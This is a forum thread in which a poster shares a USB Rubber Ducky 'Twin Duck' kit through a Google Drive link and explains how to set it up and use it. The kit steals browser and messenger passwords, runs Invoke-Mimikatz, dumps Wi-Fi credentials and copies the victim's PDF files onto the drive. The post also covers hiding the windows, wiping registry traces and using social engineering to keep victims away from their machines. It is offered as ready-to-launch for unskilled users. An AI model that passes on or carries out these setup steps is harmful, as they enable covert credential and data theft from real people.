Jump to content

Recommended Posts

Posted

Hey Guys

I thought I'd make some files available for those Guys out there who want it all

the Link contains .bat files .exe files the "short" version of the ducky script the american keyboard inject.bin 
TWIN DUCK required and Drive named "_" so yes simply _ then copy paste all the files on the twin duck and create a folder named "slurp" yes simply slurp

d.cmd.bat executes
-webrowser password.exe and saves all passwords from browser to text file on drive
-messenger.exe and saves messenger passwords to text file on drive
i.vbs is copy paste / cscript  / for running e.cmd.bat invisible
e.cmd.bat is the slurp thats presented on this Forum set to slurp .pdf files form %USERPROFILE%/Documents
on top it executes invoke mimikatz and drops creds on the drive as well
and if thats not enough it dumbs all wifi creds onto the drive

let the drive sit for at least 1 minutes the duck isnt the quickest one to slurp

Whole thing takes about 60 seconds so not exactly the preferred approach considering the time but over the course of 20+ "test subjects" I have always managed to get individuals away from their machine for more then 3 minutes so I figured get it all is possible with a well planned social engineering approach 

its as stealthy as I needed it to be

It deletes all registry paths and should not leave many traces runs with hidden or obfuscated windows 

Its not perfect by all means it can be simpler and the inject.bin can be made shorter the delays can be made shorter and unnecessary lines in the ducky script could be removed 

NONE of it is my work since I have gathered it over quite some time I cant recall everybody that played part in it and I apologize...
I just tried my best to merge it all


If someone wants to take this and make it better I would appreciate it very much 

(Be aware that the slurp of pdf files (e.cmd.bat will not work on machines with different language setup since the Folder might not be called "Documents e.g)

I apologize in advance if I crossed any AGBs I understand if it gets taken down and I dont want to upset anybody just wanted to make a Rubber Ducky blackhole ready to launch for people whos skills end with flashing the duck

I bow down to all of you who actually wrote programs and scripts that I included 

Here is the link just hope itll display all the files and makes them downloadable 

 

I honestly have no Idea if you guys can get all the files so here is the list

d.cmd.bat
e.cmd.bat
i.vbs
im.ps1
inject newmix3 short.bin  < rename inject.bin (alright?...)
L.exe.exe
P.exe.exe
newmix3 short.txt 

Yes L.exe.exe I know laugh it off haha

"https://drive.google.com/drive/folders/0Byg3drYr22Kmd0VtcXpwVi1CT1k?usp=sharing"

 

Posted

.exe files not included 
so download 
WebBrowserPassView (just google)
rename it 
p.exe (yes small p)
and download
mspass (google again)
rename it
L.exe (yes capital L)

hope it will work

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...